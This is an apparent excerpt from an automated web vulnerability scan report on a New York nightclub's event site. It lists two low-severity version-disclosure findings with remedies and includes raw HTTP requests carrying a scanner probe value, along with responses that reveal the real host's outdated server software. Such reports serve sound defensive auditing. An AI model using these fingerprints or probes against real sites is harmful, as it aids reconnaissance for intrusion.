<tr valign="top" bgcolor="#0C0C0C">
<td colspan="2" align="center" valign="middle"><span style="font-size: large; "><br />
<strong><font color="#FF0000">
<meta charset="utf-8"><span class="Apple-style-span" style="color: rgb(0, 0, 0); font-family: 'Times New Roman', Times, serif; font-weight: normal; -webkit-border-horizontal-spacing: 0px; -webkit-border-vertical-spacing: 0px; font-size: 13px; line-height: 16px; ">
<h1 style="margin-top: 0px; margin-right: 0px; margin-bottom: 0.5em; margin-left: 0px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; font-size: 21px; font-weight: normal; line-height: 0.95em; color: rgb(153, 0, 0); ">Sia</h1>
<h2 style="margin-top: 0px; margin-right: 0px; margin-bottom: 0.5em; margin-left: 0px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; font-size: 13px; font-weight: normal; line-height: 1.23em; "><span style="color: rgb(255, 255, 255); ">Oh Land</span></h2>
</span> </meta>
</font></strong></span></td>
</tr>
<tr valign="top">
<td width="355">
<table width="100%" border="0" cellspacing="5" cellpadding="5">
<tbody>
<tr bgcolor="#0C0C0C">
<td width="22%" valign="top"><b><span style="font-size: small; ">Ages</span></b></td>
<td width="78%"><span style="color: rgb(255, 255, 255); "><span style="font-size: small; ">18+</span></span></td>
</tr>
<tr bgcolor="#0C0C0C">
<td valign="top"><span style="color: rgb(255, 255, 255); "><b><span style="font-size: small; ">Doors</span></b></span></td>
<td><span style="color: rgb(255, 255, 255); "><span style="font-size: small; ">7pm</span></span></td>
</tr>
<tr bgcolor="#0C0C0C">
<td valign="top"><span style="color: rgb(255, 255, 255); "><b><span style="font-size: small; ">Tickets</span></b></span></td>
<td valign="top"><font class="Apple-style-span" color="#ffffff" size="2">$26 advance / $30 day of show&nbsp;</font><br />
<meta charset="utf-8"><font class="Apple-style-span" color="#990000" face="'Times New Roman', Times, serif"><span class="Apple-style-span" style="font-size: 11px; line-height: 13px; text-transform: uppercase; -webkit-border-horizontal-spacing: 0px; -webkit-border-vertical-spacing: 0px;">
<meta charset="utf-8" /><span class="Apple-style-span" style="color: rgb(255, 0, 0); font-family: Arial, Helvetica, sans-serif; -webkit-border-horizontal-spacing: 5px; -webkit-border-vertical-spacing: 5px; line-height: normal; text-transform: none; font-size: medium; "><img width="78" height="16" alt="" src="http://event.websterhall.com/upload/www_ticketweb(1).jpeg" /></span><br type="_moz" />
</span></font> </meta>
<span style="font-size: small; "><font class="Apple-style-span" color="#FF0000"><b><br />
</b></font></span></td>
</tr>
<tr bgcolor="#0C0C0C">
<td colspan="2" valign="top"><span class="Apple-style-span" style="font-size: small; "><b>
<div id="artist-info"><dl> <dt><font class="Apple-style-span" color="#FF0000">
<div id="artist-info">
<div id="artist-info">
<meta charset="utf-8"><span class="Apple-style-span" style="color: rgb(153, 0, 0); font-family: 'Times New Roman', Times, serif; font-size: 13px; line-height: 16px; text-transform: uppercase; ">oh land</span> </meta>
</div>
<div id="artist-info">[&nbsp;<a href="http://www.myspace.com/ohlandmusic">MYSPACE</a>]<br />
<span style="color: rgb(255, 255, 255); "><span class="Apple-style-span" style="font-family: 'Times New Roman', Times, serif; font-weight: normal; -webkit-border-horizontal-spacing: 0px; -webkit-border-vertical-spacing: 0px; font-size: 12px; line-height: 16px; ">
<meta charset="utf-8">
<meta charset="utf-8"><span style="color: rgb(255, 255, 255); "><span class="Apple-style-span">Oh Land is a peculiar new cinematic electropop Dane who recently sailed across the sea to the artistic haven of Brooklyn, NY. With an opera singer for a mother, a theater organist for a father and Bj&ouml;rk's Homogenic on constant rotation, Oh Land was enraptured by the combination of experimental and classical arts. &quot;My goal is to sound like I'm from 2050, but still feel really classic, like the music is an old friend,&quot; said Oh Land. She spent her days pirouetting as a ballet dancer at the Danish Royal Ballet Academy when an injury forced her to reinvent herself and discover her true talent and passion as a musician. Oh Land soon released her first album, Fauna, which garnered critical acclaim in her homeland of Denmark. Her soundscapes are lavish, crunchy, symphonic, brute and captivated with rhythms that fly apart. She translates the sounds live via her &quot;contraption&quot; - a homemade one-woman-band music box topped with balloon video projections (seeing is believing). Her music is for movement and new songs such as the thumping &quot;Sun of a Gun&quot; and euphoric &quot;White Nights&quot; have proven to make even the most portentous get up and dance. Having been discovered by Epic Records at 2009's SXSW, she released her US debut EP on October 19, 2010.</span><br />
<br />
</span> <br />
<div id="artist-info"><span style="color: rgb(255, 0, 0); ">
<meta charset="utf-8"><span class="Apple-style-span" style="color: rgb(153, 0, 0); font-size: 13px; text-transform: uppercase; ">Sia<br />
</span>&nbsp;[ </meta>
</span><span class="Apple-style-span" style="color: rgb(0, 0, 0); font-family: Arial, Verdana, sans-serif; line-height: normal; font-size: small; -webkit-border-horizontal-spacing: 5px; -webkit-border-vertical-spacing: 5px; ">
<div id="artist-info" style="display: inline !important; "><dl style="display: inline !important; "><dt style="display: inline !important; "><span style="color: rgb(255, 0, 0); ">
<div id="artist-info" style="display: inline !important; ">
<div id="artist-info" style="display: inline !important; "><a target="_blank" href="http://siamusic.net/">OFFICIAL WEBSITE</a> :&nbsp;</div>
</div>
</span><font class="Apple-style-span" color="#FF0000">
<div id="artist-info" style="display: inline !important; ">
<div id="artist-info" style="display: inline !important; "><span style="color: rgb(255, 255, 255); "><span class="Apple-style-span" style="font-family: 'Times New Roman', Times, serif; font-weight: normal; -webkit-border-horizontal-spacing: 0px; -webkit-border-vertical-spacing: 0px; font-size: 12px; line-height: 16px; ">
<div id="artist-info" style="display: inline !important; "><span style="color: rgb(255, 0, 0); "><a target="_blank" href="http://www.myspace.com/siamusic">MYSPACE</a>]</span><br />
<meta charset="utf-8"><span style="color: rgb(255, 255, 255); ">
<meta charset="utf-8"><span style="color: rgb(255, 255, 255); "><span class="Apple-style-span">Sia Furler, a native Australian, was born on December 18th, 1975 and was destined to be an entertainer. At a young age she would perform for her family and friends with her interpretations of Madonna, Cyndi Lauper and Men at Work. If one should be so lucky to peruse her family albums, they would certainly find photos of Sia as a child adorning pink tutus and roller skates in poses fit for Cirque du Soleil. When Sia was 9 she performed with her father's band The Soda Jerx covering the song &quot;Shimmy Shimmy Coco Bop&quot;. Be..
Apache Module Version Disclosure

Apache Module Version Disclosure
1 TOTAL
LOW
Netsparker identified that the target web server is disclosing one of the Apache modules version. This was disclosed through the HTTP response. This information can help an attacker to gain a greater understanding of the systems in use and potentially develop further attacks targeted at the specific version of Apache.

Impact

An attacker can look for specific security vulnerabilities for the identified Apache module version. The attacker can also use this information in conjunction with the other vulnerabilities in the application or the web server.

Remedy

Configure your web server to prevent information leakage from the SERVER header of its HTTP response.
- /show_event_sub.php

/show_event_sub.php

http://event.websterhall.com/show_event_sub.php?id=1595&size=dcaf1%5C

Extracted Version

mod_bwlimited/1.4 FrontPage/5.0.2.2635

Request

GET /show_event_sub.php?id=1595&size=dcaf1%5C HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: event.websterhall.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Mon, 25 Jul 2011 04:36:00 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/4.4.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=6d168262eb70370a72912db093f1d7e5; expires=Wed, 24 Aug 2011 04:36:00 GMT; path=/
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html><head><title>Webster Hall New York City | Nightclub | Venue | Record Label - 7pm - Sia</title><meta name="google-site-verification" content="0Qf19Nve42Bz-Pe2DUjICbC_SYZrzVbAEzEeHwUB49s" /><META NAME="description" CONTENT="Largest night club in New York City, nightclub, dance club, new years, ticket sales." /><META NAME="keywords" CONTENT="New York, NYC, nyc, NY, nightlife, nightlife style, night club, new years, new years eve, nite club, nightclub, nightclubs, clubbing, night club promotions, club dance, club search, dance clubs, bar, party, techno, rave, special event, tickets" /><!--link rel="stylesheet" href="css/default.css" media="screen,projection" type="text/css" /><link rel="stylesheet" href="css/lightbox.css" media="screen,projection" type="text/css" /--><!-- JavaScript --><!--script type="text/javascript" src="scripts/prototype.js"></script><script type="text/javascript" src="scripts/lightbox.js"></script--><link href="mellstyle.css" rel="stylesheet" type="text/css" /><link rel="stylesheet" type="text/css" href="css/supercali.css"><link rel="stylesheet" type="text/css" href="css/small.css"><script language="JavaScript" src="js/CalendarPopup.js"></script><script language="JavaScript">document.write(getCalendarStyles());</script><script language="JavaScript" src="js/ColorPicker2.js"></script><script language="JavaScript" src="js/miscfunctions.js"></script><!-- CSS --><link href="css/css-lightbox.css" rel="stylesheet" type="text/css"/><script type="text/javascript" language="javascript"><!-- var vbox; var vfilter; var vcontent; var http_request = false; var myResponse = "Thank You!"; var windowtitle=""; var XMLHttpArray = [ function() {return new XMLHttpRequest()}, function() {return new ActiveXObject("Msxml2.XMLHTTP")}, function() {return new ActiveXObject("Msxml2.XMLHTTP")}, function() {return new ActiveXObject("Microsoft.XMLHTTP")}]; function adm_onload() { vbox = document.getElementById('box'); vfilter = document.getElementById('filter'); vcontent = document.getElementById('boxcontent'); //vbox.style.display='none'; //vfilter.style.display='none'; } function createXMLHTTPObject() { var xmlhttp = false; for(var i=0; i<XMLHttpArray.length; i++) { try { xmlhttp = XMLHttpArray[i](); } catch(e) { continue; } break; } return xmlhttp; } function makePOSTRequest(url, parameters, title) { http_request = false; /* if (window.XMLHttpRequest) { // Mozilla, Safari,... http_request = new XMLHttpRequest(); if (http_request.overrideMimeType) { // set type accordingly to anticipated content type //http_request.overrideMimeType('text/xml'); http_request.overrideMimeType('text/html'); } } else if (window.ActiveXObject) { // IE try { http_request = new ActiveXObject("Msxml2.XMLHTTP"); } catch (e) { try { http_request = new ActiveXObject("Microsoft.XMLHTTP"); } catch (e) {} } }*/ http_request = createXMLHTTPObject(); if (!http_request) { alert('Cannot create XMLHTTP instance'); return false; } windowtitle = title; http_request.onreadystatechange = alertContents; http_request.open('POST', url, true); http_request.setRequestHeader("Content-type", "application/x-www-form-urlencoded"); http_request.setRequestHeader("Content-length", parameters.length); http_request.setRequestHeader("Connection", "close"); http_request.send(parameters); } function alertContents() { //vvar box = document.getElementById('box'); var result = ""; // document.getElementById('filter').style.display='block'; vfilter.style.display='block'; var head = document.getElementById('boxtitle'); document.bgColor = "#000000"; head.innerHTML = windowtitle; //var content = document.getElementById('boxcontent'); vcontent.style.padding = "0"; if (http_request.readyState == 4) { if (http_request.status == 200) { // alert(http_request.responseText); result = http_request.responseText; //document.getElementById('list_div').innerHTML = result; } else { // uncomment for debugging // alert('There was a problem with the request.'); } } vcontent.innerHTML = "<img src='../images/loading.gif' border=0>"; vcontent.innerHTML = result; // box.style.display='block'; vbox.style.display='block'; } function list_post(id, title, cdate) { //var content = document.getElementById('boxcontent'); vcontent.innerHTML = "<img src='../images/loading.gif' border=0>"; var poststr = "id="+id+"&size=small&cdate="+cdate; // uncomment for debugging //alert(poststr); makePOSTRequest('show_event.php', poststr, title); } function openbox(url) { //var box = document.getElementById('box'); //document.getElementById('filter').style.display='block'; vfilter.style.display='block'; var title = document.getElementById('boxtitle'); // title.innerHTML = url; //var content = document.getElementById('boxcontent'); vcontent.style.padding="0"; vcontent.innerHTML = "...dynamic content..."; vcontent.innerHTML = url; //box.style.display='block'; vbox.style.display='block'; } function closebox() { vbox.style.display='none'; vfilter.style.display='none'; //document.getElementById('box').style.display = 'none'; //document.getElementById('filter').style.display = 'none'; document.bgColor='#000000';}--></script><script language="JavaScript" type="text/javascript"><!--function zxcWWHS(){ if (document.all) { zxcCur='hand'; zxcWH=document.documentElement.clientHeight; zxcWW=document.documentElement.clientWidth; zxcWS=document.documentElement.scrollTop; if (zxcWH==0) { zxcWS=document.body.scrollTop; zxcWH=document.body.clientHeight; zxcWW=document.body.clientWidth; } } else if (document.getElementById) { zxcCur='pointer'; zxcWH=window.innerHeight-15; zxcWW=window.innerWidth-15; zxcWS=window.pageYOffset; } zxcWC=Math.round(zxcWW/2); return [zxcWW,zxcWH,zxcWS];}window.onscroll=function(){ var img=document.getElementById('box'); if (!document.all){ img.style.position='fixed'; window.onscroll=null; return; } if (!img.pos){ img.pos=img.offsetTop; } img.style.top=(parseInt(zxcWWHS()[2])+100)+'px';}//--></script><base target="_blank"></head><style type="text/css"><!--body{ background-color:#000000;}--></style><!--<body style="background-color:#000000;" onload='javascript:adm_onload();'>--><div id="filter"></div><div id="box" style="background-color:#000000;"> <div id="boxheader"> <span id="boxtitle"> </span> <span id="boxclose" onClick="closebox()"></span> </div> <div id="boxcontent"> </div></div><table width="750" border="0" align="center" cellpadding="0" cellspacing="0"> <tr><td></td></tr> <tr> <td valign="top"><!--div class="top"><h4>Webster Hall New York City | Nightclub | Venue | Record Label</h4><h1>7pm - Sia</h1></div--><div class="content"><strong>Wednesday, July 27, 2011 - 7:00 PM</strong><br><p><table width="756" border="0" cellspacing="10" cellpadding="5">
<tbody>
<tr valign="top" bgcolor="#0C0C0C">
<td colspan="2" align="center" valign="middle"><span style="font-size: large; "><br />
<strong><font color="#FF0000">
<meta charset="utf-8"><span class="Apple-style-span" style="color: rgb(0, 0, 0); font-family: 'Times New Roman', Times, serif; font-weight: normal; -webkit-border-horizontal-spacing: 0px; -webkit-border-vertical-spacing: 0px; font-size: 13px; line-height: 16px; ">
<h1 style="margin-top: 0px; margin-right: 0px; margin-bottom: 0.5em; margin-left: 0px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; font-size: 21px; font-weight: normal; line-height: 0.95em; color: rgb(153, 0, 0); ">Sia</h1>
<h2 style="margin-top: 0px; margin-right: 0px; margin-bottom: 0.5em; margin-left: 0px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; font-size: 13px; font-weight: normal; line-height: 1.23em; "><span style="color: rgb(255, 255, 255); ">Oh Land</span></h2>
</span> </meta>
</font></strong></span></td>
</tr>
<tr valign="top">
<td width="355">
<table width="100%" border="0" cellspacing="5" cellpadding="5">
<tbody>
<tr bgcolor="#0C0C0C">
<td width="22%" valign="top"><b><span style="font-size: small; ">Ages</span></b></td>
<td width="78%"><span style="color: rgb(255, 255, 255); "><span style="font-size: small; ">18+</span></span></td>
</tr>
<tr bgcolor="#0C0C0C">
<td valign="top"><span style="color: rgb(255, 255, 255); "><b><span style="font-size: small; ">Doors</span></b></span></td>
<td><span style="color: rgb(255, 255, 255); "><span style="font-size: small; ">7pm</span></span></td>
</tr>
<tr bgcolor="#0C0C0C">
<td valign="top"><span style="color: rgb(255, 255, 255); "><b><span style="font-size: small; ">Tickets</span></b></span></td>
<td valign="top"><font class="Apple-style-span" color="#ffffff" size="2">$26 advance / $30 day of show&nbsp;</font><br />
<meta charset="utf-8"><font class="Apple-style-span" color="#990000" face="'Times New Roman', Times, serif"><span class="Apple-style-span" style="font-size: 11px; line-height: 13px; text-transform: uppercase; -webkit-border-horizontal-spacing: 0px; -webkit-border-vertical-spacing: 0px;">
<meta charset="utf-8" /><span class="Apple-style-span" style="color: rgb(255, 0, 0); font-family: Arial, Helvetica, sans-serif; -webkit-border-horizontal-spacing: 5px; -webkit-border-vertical-spacing: 5px; line-height: normal; text-transform: none; font-size: medium; "><img width="78" height="16" alt="" src="http://event.websterhall.com/upload/www_ticketweb(1).jpeg" /></span><br type="_moz" />
</span></font> </meta>
<span style="font-size: small; "><font class="Apple-style-span" color="#FF0000"><b><br />
</b></font></span></td>
</tr>
<tr bgcolor="#0C0C0C">
<td colspan="2" valign="top"><span class="Apple-style-span" style="font-size: small; "><b>
<div id="artist-info"><dl> <dt><font class="Apple-style-span" color="#FF0000">
<div id="artist-info">
<div id="artist-info">
<meta charset="utf-8"><span class="Apple-style-span" style="color: rgb(153, 0, 0); font-family: 'Times New Roman', Times, serif; font-size: 13px; line-height: 16px; text-transform: uppercase; ">oh land</span> </meta>
</div>
<div id="artist-info">[&nbsp;<a href="http://www.myspace.com/ohlandmusic">MYSPACE</a>]<br />
<span style="color: rgb(255, 255, 255); "><span class="Apple-style-span" style="font-family: 'Times New Roman', Times, serif; font-weight: normal; -webkit-border-horizontal-spacing: 0px; -webkit-border-vertical-spacing: 0px; font-size: 12px; line-height: 16px; ">
<meta charset="utf-8">
<meta charset="utf-8"><span style="color: rgb(255, 255, 255); "><span class="Apple-style-span">Oh Land is a peculiar new cinematic electropop Dane who recently sailed across the sea to the artistic haven of Brooklyn, NY. With an opera singer for a mother, a theater organist for a father and Bj&ouml;rk's Homogenic on constant rotation, Oh Land was enraptured by the combination of experimental and classical arts. &quot;My goal is to sound like I'm from 2050, but still feel really classic, like the music is an old friend,&quot; said Oh Land. She spent her days pirouetting as a ballet dancer at the Danish Royal Ballet Academy when an injury forced her to reinvent herself and discover her true talent and passion as a musician. Oh Land soon released her first album, Fauna, which garnered critical acclaim in her homeland of Denmark. Her soundscapes are lavish, crunchy, symphonic, brute and captivated with rhythms that fly apart. She translates the sounds live via her &quot;contraption&quot; - a homemade one-woman-band music box topped with balloon video projections (seeing is believing). Her music is for movement and new songs such as the thumping &quot;Sun of a Gun&quot; and euphoric &quot;White Nights&quot; have proven to make even the most portentous get up and dance. Having been discovered by Epic Records at 2009's SXSW, she released her US debut EP on October 19, 2010.</span><br />
<br />
</span> <br />
<div id="artist-info"><span style="color: rgb(255, 0, 0); ">
<meta charset="utf-8"><span class="Apple-style-span" style="color: rgb(153, 0, 0); font-size: 13px; text-transform: uppercase; ">Sia<br />
</span>&nbsp;[ </meta>
</span><span class="Apple-style-span" style="color: rgb(0, 0, 0); font-family: Arial, Verdana, sans-serif; line-height: normal; font-size: small; -webkit-border-horizontal-spacing: 5px; -webkit-border-vertical-spacing: 5px; ">
<div id="artist-info" style="display: inline !important; "><dl style="display: inline !important; "><dt style="display: inline !important; "><span style="color: rgb(255, 0, 0); ">
<div id="artist-info" style="display: inline !important; ">
<div id="artist-info" style="display: inline !important; "><a target="_blank" href="http://siamusic.net/">OFFICIAL WEBSITE</a> :&nbsp;</div>
</div>
</span><font class="Apple-style-span" color="#FF0000">
<div id="artist-info" style="display: inline !important; ">
<div id="artist-info" style="display: inline !important; "><span style="color: rgb(255, 255, 255); "><span class="Apple-style-span" style="font-family: 'Times New Roman', Times, serif; font-weight: normal; -webkit-border-horizontal-spacing: 0px; -webkit-border-vertical-spacing: 0px; font-size: 12px; line-height: 16px; ">
<div id="artist-info" style="display: inline !important; "><span style="color: rgb(255, 0, 0); "><a target="_blank" href="http://www.myspace.com/siamusic">MYSPACE</a>]</span><br />
<meta charset="utf-8"><span style="color: rgb(255, 255, 255); ">
<meta charset="utf-8"><span style="color: rgb(255, 255, 255); "><span class="Apple-style-span">Sia Furler, a native Australian, was born on December 18th, 1975 and was destined to be an entertainer. At a young age she would perform for her family and friends with her interpretations of Madonna, Cyndi Lauper and Men at Work. If one should be so lucky to peruse her family albums, they would certainly find photos of Sia as a child adorning pink tutus and roller skates in poses fit for Cirque du Soleil. When Sia was 9 she performed with her father's band The Soda Jerx covering the song &quot;Shimmy Shimmy Coco Bop&quot;. Be..
Frontpage Version Disclosure

Frontpage Version Disclosure
1 TOTAL
LOW
Netsparker identified that the target web server is disclosing the FrontPage version in use through the HTTP response. This information can help an attacker to gain a greater understanding of the system in use and potentially develop further attacks targeted at the specific web server version.

Impact

An attacker can look for specific security vulnerabilities for the version identified. The attacker can also use this information in conjunction with the other vulnerabilities in the application or the web server.

Remedy

Configure your web server to prevent information leakage from headers of its HTTP response.
- /show_event_sub.php

/show_event_sub.php

http://event.websterhall.com/show_event_sub.php?id=1595&size=dcaf1%5C

Extracted Version

FrontPage/5.0.2.2635

Request

GET /show_event_sub.php?id=1595&size=dcaf1%5C HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: event.websterhall.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Mon, 25 Jul 2011 04:36:00 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/4.4.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=6d168262eb70370a72912db093f1d7e5; expires=Wed, 24 Aug 2011 04:36:00 GMT; path=/
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html><head><title>Webster Hall New York City | Nightclub | Venue | Record Label - 7pm - Sia</title><meta name="google-site-verification" content="0Qf19Nve42Bz-Pe2DUjICbC_SYZrzVbAEzEeHwUB49s" /><META NAME="description" CONTENT="Largest night club in New York City, nightclub, dance club, new years, ticket sales." /><META NAME="keywords" CONTENT="New York, NYC, nyc, NY, nightlife, nightlife style, night club, new years, new years eve, nite club, nightclub, nightclubs, clubbing, night club promotions, club dance, club search, dance clubs, bar, party, techno, rave, special event, tickets" /><!--link rel="stylesheet" href="css/default.css" media="screen,projection" type="text/css" /><link rel="stylesheet" href="css/lightbox.css" media="screen,projection" type="text/css" /--><!-- JavaScript --><!--script type="text/javascript" src="scripts/prototype.js"></script><script type="text/javascript" src="scripts/lightbox.js"></script--><link href="mellstyle.css" rel="stylesheet" type="text/css" /><link rel="stylesheet" type="text/css" href="css/supercali.css"><link rel="stylesheet" type="text/css" href="css/small.css"><script language="JavaScript" src="js/CalendarPopup.js"></script><script language="JavaScript">document.write(getCalendarStyles());</script><script language="JavaScript" src="js/ColorPicker2.js"></script><script language="JavaScript" src="js/miscfunctions.js"></script><!-- CSS --><link href="css/css-lightbox.css" rel="stylesheet" type="text/css"/><script type="text/javascript" language="javascript"><!-- var vbox; var vfilter; var vcontent; var http_request = false; var myResponse = "Thank You!"; var windowtitle=""; var XMLHttpArray = [ function() {return new XMLHttpRequest()}, function() {return new ActiveXObject("Msxml2.XMLHTTP")}, function() {return new ActiveXObject("Msxml2.XMLHTTP")}, function() {return new ActiveXObject("Microsoft.XMLHTTP")}]; function adm_onload() { vbox = document.getElementById('box'); vfilter = document.getElementById('filter'); vcontent = document.getElementById('boxcontent'); //vbox.style.display='none'; //vfilter.style.display='none'; } function createXMLHTTPObject() { var xmlhttp = false; for(var i=0; i<XMLHttpArray.length; i++) { try { xmlhttp = XMLHttpArray[i](); } catch(e) { continue; } break; } return xmlhttp; } function makePOSTRequest(url, parameters, title) { http_request = false; /* if (window.XMLHttpRequest) { // Mozilla, Safari,... http_request = new XMLHttpRequest(); if (http_request.overrideMimeType) { // set type accordingly to anticipated content type //http_request.overrideMimeType('text/xml'); http_request.overrideMimeType('text/html'); } } else if (window.ActiveXObject) { // IE try { http_request = new ActiveXObject("Msxml2.XMLHTTP"); } catch (e) { try { http_request = new ActiveXObject("Microsoft.XMLHTTP"); } catch (e) {} } }*/ http_request = createXMLHTTPObject(); if (!http_request) { alert('Cannot create XMLHTTP instance'); return false; } windowtitle = title; http_request.onreadystatechange = alertContents; http_request.open('POST', url, true); http_request.setRequestHeader("Content-type", "application/x-www-form-urlencoded"); http_request.setRequestHeader("Content-length", parameters.length); http_request.setRequestHeader("Connection", "close"); http_request.send(parameters); } function alertContents() { //vvar box = document.getElementById('box'); var result = ""; // document.getElementById('filter').style.display='block'; vfilter.style.display='block'; var head = document.getElementById('boxtitle'); document.bgColor = "#000000"; head.innerHTML = windowtitle; //var content = document.getElementById('boxcontent'); vcontent.style.padding = "0"; if (http_request.readyState == 4) { if (http_request.status == 200) { // alert(http_request.responseText); result = http_request.responseText; //document.getElementById('list_div').innerHTML = result; } else { // uncomment for debugging // alert('There was a problem with the request.'); } } vcontent.innerHTML = "<img src='../images/loading.gif' border=0>"; vcontent.innerHTML = result; // box.style.display='block'; vbox.style.display='block'; } function list_post(id, title, cdate) { //var content = document.getElementById('boxcontent'); vcontent.innerHTML = "<img src='../images/loading.gif' border=0>"; var poststr = "id="+id+"&size=small&cdate="+cdate; // uncomment for debugging //alert(poststr); makePOSTRequest('show_event.php', poststr, title); } function openbox(url) { //var box = document.getElementById('box'); //document.getElementById('filter').style.display='block'; vfilter.style.display='block'; var title = document.getElementById('boxtitle'); // title.innerHTML = url; //var content = document.getElementById('boxcontent'); vcontent.style.padding="0"; vcontent.innerHTML = "...dynamic content..."; vcontent.innerHTML = url; //box.style.display='block'; vbox.style.display='block'; } function closebox() { vbox.style.display='none'; vfilter.style.display='none'; //document.getElementById('box').style.display = 'none'; //document.getElementById('filter').style.display = 'none'; document.bgColor='#000000';}--></script><script language="JavaScript" type="text/javascript"><!--function zxcWWHS(){ if (document.all) { zxcCur='hand'; zxcWH=document.documentElement.clientHeight; zxcWW=document.documentElement.clientWidth; zxcWS=document.documentElement.scrollTop; if (zxcWH==0) { zxcWS=document.body.scrollTop; zxcWH=document.body.clientHeight; zxcWW=document.body.clientWidth; } } else if (document.getElementById) { zxcCur='pointer'; zxcWH=window.innerHeight-15; zxcWW=window.innerWidth-15; zxcWS=window.pageYOffset; } zxcWC=Math.round(zxcWW/2); return [zxcWW,zxcWH,zxcWS];}window.onscroll=function(){ var img=document.getElementById('box'); if (!document.all){ img.style.position='fixed'; window.onscroll=null; return; } if (!img.pos){ img.pos=img.offsetTop; } img.style.top=(parseInt(zxcWWHS()[2])+100)+'px';}//--></script><base target="_blank"></head><style type="text/css"><!--body{ background-color:#000000;}--></style><!--<body style="background-color:#000000;" onload='javascript:adm_onload();'>--><div id="filter"></div><div id="box" style="background-color:#000000;"> <div id="boxheader"> <span id="boxtitle"> </span> <span id="boxclose" onClick="closebox()"></span> </div> <div id="boxcontent"> </div></div><table width="750" border="0" align="center" cellpadding="0" cellspacing="0"> <tr><td></td></tr> <tr> <td valign="top"><!--div class="top"><h4>Webster Hall New York City | Nightclub | Venue | Record Label</h4><h1>7pm - Sia</h1></div--><div class="content"><strong>Wednesday, July 27, 2011 - 7:00 PM</strong><br><p><table width="756" border="0" cellspacing="10" cellpadding="5">
<tbody>
<tr valign="top" bgcolor="#0C0C0C">
<td colspan="2" align="center" valign="middle"><span style="font-size: large; "><br />
<strong><font color="#FF0000">
<meta charset="utf-8"><span class="Apple-style-span" style="color: rgb(0, 0, 0); font-family: 'Times New Roman', Times, serif; font-weight: normal; -webkit-border-horizontal-spacing: 0px; -webkit-border-vertical-spacing: 0px; font-size: 13px; line-height: 16px; ">
<h1 style="margin-top: 0px; margin-right: 0px; margin-bottom: 0.5em; margin-left: 0px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; font-size: 21px; font-weight: normal; line-height: 0.95em; color: rgb(153, 0, 0); ">Sia</h1>
<h2 style="margin-top: 0px; margin-right: 0px; margin-bottom: 0.5em; margin-left: 0px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; font-size: 13px; font-weight: normal; line-height: 1.23em; "><span style="color: rgb(255, 255, 255); ">Oh Land</span></h2>
</span> </meta>
</font></strong></span></td>
</tr>
<tr valign="top">
<td width="355">
<table width="100%" border="0" cellspacing="5" cellpadding="5">
<tbody>
<tr bgcolor="#0C0C0C">
<td width="22%" valign="top"><b><span style="font-size: small; ">Ages</span></b></td>
<td width="78%"><span style="color: rgb(255, 255, 255); "><span style="font-size: small; ">18+</span></span></td>
</tr>
<tr bgcolor="#0C0C0C">
<td valign="top"><span style="color: rgb(255, 255, 255); "><b><span style="font-size: small; ">Doors</span></b></span></td>
<td><span style="color: rgb(255, 255, 255); "><span style="font-size: small; ">7pm</span></span></td>
</tr>
<tr bgcolor="#0C0C0C">
<td valign="top"><span style="color: rgb(255, 255, 255); "><b><span style="font-size: small; ">Tickets</span></b></span></td>
<td valign="top"><font class="Apple-style-span" color="#ffffff" size="2">$26 advance / $30 day of show&nbsp;</font><br />
<meta charset="utf-8"><font class="Apple-style-span" color="#990000" face="'Times New Roman', Times, serif"><span class="Apple-style-span" style="font-size: 11px; line-height: 13px; text-transform: uppercase; -webkit-border-horizontal-spacing: 0px; -webkit-border-vertical-spacing: 0px;">
<meta charset="utf-8" /><span class="Apple-style-span" style="color: rgb(255, 0, 0); font-family: Arial, Helvetica, sans-serif; -webkit-border-horizontal-spacing: 5px; -webkit-border-vertical-spacing: 5px; line-height: normal; text-transform: none; font-size: medium; "><img width="78" height="16" alt="" src="http://event.websterhall.com/upload/www_ticketweb(1).jpeg" /></span><br type="_moz" />
</span></font> </meta>
<span style="font-size: small; "><font class="Apple-style-span" color="#FF0000"><b><br />
</b></font></span></td>
</tr>
<tr bgcolor="#0C0C0C">
<td colspan="2" valign="top"><span class="Apple-style-span" style="font-size: small; "><b>
<div id="artist-info"><dl> <dt><font class="Apple-style-span" color="#FF0000">
<div id="artist-info">
<div id="artist-info">
<meta charset="utf-8"><span class="Apple-style-span" style="color: rgb(153, 0, 0); font-family: 'Times New Roman', Times, serif; font-size: 13px; line-height: 16px; text-transform: uppercase; ">oh land</span> </meta>
</div>
